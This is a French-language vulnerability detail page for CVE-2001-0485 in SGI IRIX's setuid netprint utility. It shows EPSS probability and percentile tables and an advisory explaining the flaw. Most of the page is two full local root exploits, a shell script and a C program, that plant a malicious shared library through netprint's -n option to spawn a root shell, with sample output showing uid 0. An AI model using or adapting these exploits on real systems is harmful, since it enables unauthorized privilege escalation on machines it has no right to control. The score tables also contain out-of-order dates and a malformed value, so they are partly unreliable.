CVE-2001-0485 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	1.92%	–	–
2022-02-13	–	–	1.92%	–	–
2022-04-03	–	–	1.92%	–	–
2022-06-26	–	–	1.92%	–	–
2022-11-13	–	–	1.92%	–	–
2022-11-20	–	–	1.92%	–	–
2022-12-11	–	–	1.92%	–	–
2022-12-18	–	–	1.92%	–	–
2022-12-25	–	–	1.92%	–	–
2023-01-01	–	–	1.92%	–	–
2023-02-12	–	–	1.92%	–	–
2023-03-12	–	–	–	0.04%	–
2024-06-02	–	–	–	0.04%	–
2024-12-22	–	–	–	0.05%	–
2025-03-02	–	–	–	0.05%	–
2025-01-19	–	–	–	0.05%	–
2025-03-09	–	–	–	0.05%	–
2025-03-18	–	–	–	–	0.12%
2025-03-30	–	–	–	–	0.13%
2025-03-30	–	–	–	–	0.13,%

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Date	Percentile
2022-02-06	55%
2022-02-13	56%
2022-04-03	76%
2022-06-26	77%
2022-11-13	78%
2022-11-20	77%
2022-12-11	78%
2022-12-18	77%
2022-12-25	78%
2023-01-01	77%
2023-02-12	78%
2023-03-12	–
2024-06-02	–
2024-12-22	18%
2025-03-02	19%
2025-01-19	18%
2025-03-09	19%
2025-03-18	28%
2025-03-30	29%
2025-03-30	29%

#!/bin/sh ## copyright LAST STAGE OF DELIRIUM jul 2000 poland *://lsd-pl.net/ # ## /usr/lib/print/netprint # ## # ## This code gets released due to another post to the Bugtraq mailing list. # ## For IRIX 6.3 and above this privilage escalation attack can be conducted # ## by local lp users only. # EXECUTABLE=/usr/lib/print/netprint LIBRARY=lsd DIRECTORY=/tmp cd $DIRECTORY cat > $LIBRARY.c << 'EOF' OpenConn(){ printf("copyright LAST STAGE OF DELIRIUM jul 2000 poland //lsd-pl.net/\n"); printf("/usr/lib/print/netprint for irix 5.3 6.2 6.3 6.4 6.5 6.5.11 IP:all\n"); printf("\n"); setreuid(getuid(),0);setuid(0);setgid(0); execl("/bin/sh","sh",0); } CloseConn(){} ListPrinters(){} SendJob(){} CancelJob(){} WaitForJob(){} GetQueue(){} StartTagging(){} StopTagging(){} Install(){} AddTimeout(){} RemoveSemiColons(){} ListAllPrinters(){} CreateInterface(){} InstallPrinter(){} InstallIcon(){} SockRead(){} IsDest(){} BSDSendJob(){} EOF cc -c $LIBRARY.c -o $LIBRARY.o ld -shared $LIBRARY.o -o $LIBRARY.so rm -rf $LIBRARY.[co] so_locations if [ ! -f "$LIBRARY.so" ] then echo "error: building library" exit 1 fi chmod 666 $LIBRARY.so $EXECUTABLE -n ../../../../$DIRECTORY/$LIBRARY -h localhost -p lalala bzz-zz # milw0rm.com [2001-05-08]

// source: https://www.securityfocus.com/bid/2656/info The 'netprint' utility shipped with SGI Irix systems is used to send print jobs to print spoolers on remote hosts. It is installed setuid root by default. At the command line, 'netprint' accepts an option to specify the network type (-n). This option is argumented with a string representing the type. 'netprint' uses this argument to open a shared library. There is no input validation on this string, and as a result it is possible for attackers to have malicious shared libraries used. Since 'netprint' is setuid root, malicious code contained in attacker supplied shared libraries will be executed with superuser privileges. It has been reported that only 'lp' can execute 'netprint'. On many earlier versions of Irix, 'lp' was a passwordless default account. If this account has not been disabled, it is entirely possible for remote users to log into systems without a password as 'lp' and gain root access using this vulnerability. /* (IRIX)netprint[] local root exploit, by: v9[v9@fakehalo.org]. this will give you uid=0 on IRIX systems. this exploit simply takes advantage of netprint's -n option to execute arbitrary code and gain elevated privileges. example: ------------------------------------------------------------------------------ $ cc xnetprint.c -o xnetprint $ id uid=9(lp) gid=9(lp) $ ./xnetprint /bin/sh [(IRIX)netprint[] local root exploit, by: v9[v9@realhalo.org]. ] [*] making symbols source file for netprint to execute. [*] done, now compiling symbols source file. [*] done, now checking to see if the symbols source compiled. [*] done, now executing netprint. [*] success, uid: 0, euid: 0, gid: 0, egid: 0. # id uid=0(root) gid=0(sys) # ------------------------------------------------------------------------------ note: built and tested on IRIX 6.2. this often requires the uid of lp to work correctly. though, should prove effective up to 6.4 or higher. */ #include <stdio.h> #include <unistd.h> #include <sys/stat.h> #define PATH "/usr/lib/print/netprint" /* path to exploitable program. */ #define CCPATH "/usr/bin/cc" /* path to compiler. */ #define SRCFILE "/tmp/xnetrpintso.c" /* path to temporary symbols source. */ #define SOFILE "/tmp/xnetprintso.so" /* path to compile as. */ #define FAKESOFILE "../../../../tmp/xnetprintso" /* arg to feed netprint. */ void cleanup(unsigned short i){ if(!access(SRCFILE,F_OK)) unlink(SRCFILE); if(!access(SOFILE,F_OK)) unlink(SOFILE); if(i) exit(i); } int main(int argc,char **argv){ char *syscmd; struct stat mod; FILE *symbol; printf("[(IRIX)netprint[] local root exploit, by: v9[v9@realhalo.org]. ]\n"); if(argc<2){ printf("[!] syntax: %s </path/to/program/to/exec>\n",argv[0]); cleanup(1); } if(stat(PATH,&mod)){ printf("[!] failed, could not get stats on %s.\n",PATH); cleanup(1); } if(mod.st_uid||!(S_ISUID&mod.st_mode)){ printf("[!] failed, %s is not setuid root.\n",PATH); cleanup(1); } if(access(argv[1],X_OK)){ printf("[!] failed, %s doesn't seem to exist or is not executable.\n", argv[1]); cleanup(1); } if(access(CCPATH,X_OK)){ printf("[!] failed, %s compiler doesn't seem to exist or is not executable." "\n",CCPATH); cleanup(1); } printf("[*] making symbols source file for netprint to execute.\n"); cleanup(0); if(!(symbol=fopen(SRCFILE,"w"))){ printf("[!] failed, could not open temporary file to write to.\n"); cleanup(1); } fprintf(symbol,"void OpenConn(){\n"); fprintf(symbol," seteuid(0);\n"); fprintf(symbol," setuid(0);\n"); fprintf(symbol," setegid(0);\n"); fprintf(symbol," setgid(0);\n"); fprintf(symbol," printf(\"\[*] success, uid: %%u, euid: %%u, gid: %%u, egid: " "%%u.\\n\",getuid(),geteuid(),getgid(),getegid());\n"); fprintf(symbol," execl(\"%s\",\"%s\",0);\n",argv[1],argv[1]); fprintf(symbol,"}\n"); fprintf(symbol,"void CloseConn(){}\n"); fprintf(symbol,"void ListPrinters(){}\n"); fprintf(symbol,"void SendJob(){}\n"); fprintf(symbol,"void CancelJob(){}\n"); fprintf(symbol,"void WaitForJob(){}\n"); fprintf(symbol,"void GetQueue(){}\n"); fprintf(symbol,"void StartTagging(){}\n"); fprintf(symbol,"void StopTagging(){}\n"); fprintf(symbol,"void Install(){}\n"); fprintf(symbol,"void IsDest(){}\n"); fclose(symbol); printf("[*] done, now compiling symbols source file.\n"); if(!(syscmd=(char *)malloc(strlen(CCPATH)+strlen(SRCFILE)+strlen(SOFILE)+13+1) )){ printf("[!] failed, could not allocate memory.\n"); cleanup(1); } sprintf(syscmd,"%s %s -shared -o %s",CCPATH,SRCFILE,SOFILE); system(syscmd); printf("[*] done, now checking to see if the symbols source compiled.\n"); if(access(SOFILE,R_OK)){ printf("[!] failed, symbols source was not compiled properly.\n"); cleanup(1); } printf("[*] done, now executing netprint.\n"); if(execl(PATH,PATH,"-n",FAKESOFILE,"-h0","-p0","0-0",0)){ printf("[!] failed, %s did not execute properly.\n",PATH); cleanup(1); } }